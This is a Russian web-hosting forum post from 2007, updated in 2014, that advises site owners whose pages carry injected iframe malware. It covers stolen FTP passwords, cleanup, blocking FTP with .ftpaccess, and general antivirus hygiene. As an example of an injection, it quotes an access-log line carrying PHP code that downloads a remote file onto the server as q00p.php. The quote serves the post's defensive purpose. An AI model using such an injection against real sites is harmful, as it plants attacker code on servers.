RuWeb.net - хостинг и регистрация доменных имен
ГЛАВНАЯ ХОСТИНГ ДОМЕНЫ VDS СЕРВЕР ИНФОРМАЦИЯ КЛИЕНТЫ ПРАВИЛА ОПЛАТА ЗАКАЗ ФОРУМ
go to bottom

Версия для печати | Подписаться | Добавить в избранное  
Автор: Тема: iframe или "у меня на сайте вирусы!" (старая тема)
kpv
Super Administrator
*********




Сообщения: 2141
Зарегистрирован: 24.9.2004
Пользователя нет на форуме

[*] когда размещено 10.4.2007 в 20:41
iframe или "у меня на сайте вирусы!" (старая тема)


Внимание! Актуальная тема тут:
http://forum.ruweb.net/viewthread.php?tid=2896



Нижесказанное писалось в 2007 году, во времена эпохи Windows XP. Нельзя не отметить, что сейчас (в 2014-м) безопасность подтянулась на уровне системы, и мы уже очень редко сталкиваемся со взломами путем кражи паролей к ftp и размещению на сайтах вирусов, осуществляющих заражение посетителей через браузеры.
Но, к сожалению, это не означает что вредительского ПО стало меньше, просто изменился характер действий злоумышленников. Все чаще площадка для размещения сайта используется ими для рассылки спама и осуществления атак на другие сервера, а заражение происходит через уязвимости в CMS сайта. При этом работоспособность самого сайта не нарушается, и его владелец ни о чем не догадывается, до тех пор пока не получит уведомление от хостера.



Далее - старый текст за 2007 год, который, тем не менее, может оказаться полезен:

----------------------------------------------------------------------------------------

iframe или "у меня на сайте вирусы!"


1. Заходя на свой сайт, пользователь получает предупреждение от антивируса о том что сайт заражен. (Иногда вместо этого отображается просто белая страница или куски кода на ней.)
2. При просмотре исходного кода страницы обнаруживает чужеродный код (чаще всего заключенный в тэг <iframe>...</iframe>).

В подавляющем большинстве случаев выясняется, что у него были украдены пароли доступа к аккаунту.

Пример кражи ftp-паролей описан здесь:
http://forum.ruweb.net/viewthread.php?tid=2548


ЧТО ДЕЛАТЬ?

1. прежде всего вычистить свой компьютер от различной "заразы", например, установив антивирус со свежими обновлениями. в критических случаях Вам придётся полностью переустановить систему, так как внедрение вирусов на Ваш компьютер может дойти до такой степени, что лечению это не поддаётся.
2. поставить ВСЕ ЗАПЛАТКИ (сервис-паки) на свою операционную систему, убирающие уязвимости windows известные компании microsoft до текущего времени.
3. сменить все свои пароли, в том числе и на почтовые ящики на бесплатных хостингах. пароли, полученные для доступа к нашим услугам, можете по этим инструкциям
http://forum.ruweb.net/viewthread.php?tid=1829
4. если на сайте используется, в качестве движка, какая-то не самописная CMS, то следует обновиться до актуальной версии.
Вот пример инъекции
Цитата:

188.120.239.212 - - [30/Nov/2012:03:11:08 +0300] "GET /index.php?<?error_reporting(0);print(___);copy('http://desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> HTTP/1.0" 301 - "-" "-"


5. заблокировать ftp доступ к сайту. пример для тех серверов, где proftpd:
http://www.proftpd.org/localsite/Userguide/linked/x1021.html
создайте, например, файловым менеджером директадмина
http://site-helper.ru/uploading.html#filemanager
файл .ftpaccess
с таким содержанием
Цитата:

<Limit>
DenyAll
</Limit>

если же есть полная уверенность, что с Вашей сети, например, заражение не произойдёт, а от всех остальных хотелось бы закрыть доступ, то можете разрешить доступ с некоторго диапазона адресов, например так
Цитата:

<Limit ALL>
Allow 192.168.0.1/32
DenyAll
</Limit>


Плагин FTPKey в панели управления DirectAdmin
http://forum.ruweb.net/viewthread.php?tid=2927


Как Не Заразиться И Как Правильно Лечиться
* материал взят из поста ЗАРАЗА на локальном форуме sanet.nnov.ru 25.10.2007

Сейчас поколения троянских программ меняются по несколько раз в сутки, причем некоторых - автоматически при выходе обновленных баз к популярным антивирусам. Поэтому наличие антивируса, даже регулярно обновляемого, снижает риск, но совсем не гарантирует безопасности. Желательно, соблюдать элементарные меры гигиены. А именно:

1. Иметь в системе несколько учетных записей. Для работы с Интернет и закачки подозрительного содержимого держать отдельную учетную запись без прав администратора. Мера по надежности лучше любого антивируса.
2. Загружать исполняемый файлы только из известных и проверенных источников. Если качается какая-то новая программа - найти через Google официальный сайт и скачать оттуда. Ни в коем разе не с торрентов, тем более внешних, даже если это свежая игрушка. Если по другому ну совсем никак - закачать, подождать пару дней, проверить свежим антивирусом. Тоже касается кряков к программам.
3. Лучше использовать альтернативный браузер, Mozilla или Opera. Особенно любителям porno, warez, кряков и иже с ним. Ошибок в них не меньше, но ломают их реже.
4. Обновлять антивирус перед каждым выходом в интернет и не реже чем раз в 3 часа при активном браузинге. Лучше чаще.
5. Использовать какие-либо альтернативы антивирусам. Например http://www.gentlesecurity.com/ - достаточно надежный способ защиты.
6. если на сайте используется, в качестве движка, какая-то не самописная CMS, то следует постоянно читать новости разработчиков и вовремя обновляться до актуальной версии.

Если все-таки заразились, то лечиться следующим образом. Антивирусом с самыми последними базами (причем иметь ввиду, что Dr.Web, AVG, NOD32, McAfee работают очень неоперативно, даже если выпускают обновления часто. Kaspersky, Symantec выпускает обновления достаточно шустро. Panda - сносно). Убедиться, что боновление баз прошло успешно. Лучше скачать пару антивирусов, хотя бы триальных версий того же Касперского.

1. Перегрузиться в безопасный режим. Найти/удалить троянцев.
2. Перегрузиться в обычный режим. Подождать немного.
3. Перегрузиться опять в безопасный режим. Если троянцы опять есть - oops. Если не умеем чистить вручную, то форматируем диск.
4. Достаточно свежая утилитка, можно потестировать:
http://www.online-solutions.ru/osam_autorun.php
5. Для очень продвинутых пользователей - AVZ ( http://www.z-oleg.com/secur/avz/ ). Обязательно включать AVZGuard.
6. По окончании лечения проверить c:\windows\system32\drivers\etc\hosts - удалить лишние записи.


[Отредактировано 16.8.2015 кто timru]
Просмотреть Профиль Пользователя Посетить Домашнюю Страницу Пользователя Просмотреть все сообщения этого пользователя Отправить пользователю личное сообщение

Powered by XMB
Разработано Группа XMB © 2001-2008
[запросов: 21] [PHP: 76.7% - SQL: 23.3%]
go to top
Центр поддержки (круглосуточно)
https://ruweb.net/support/
Москва(499) 502-44-31
Санкт-Петербург(812) 336-42-55
Нижний Новгород(831) 411-12-44
Екатеринбург(343) 204-71-16
© 2002-2013 ЗАО "РУВЕБ"

Дизайн - CredoDesign
Rambler\'s Top100 Рейтинг@Mail.ru
RuWeb.net - Хостинг веб-сайтов (первый месяц - бесплатно). Регистрация доменов.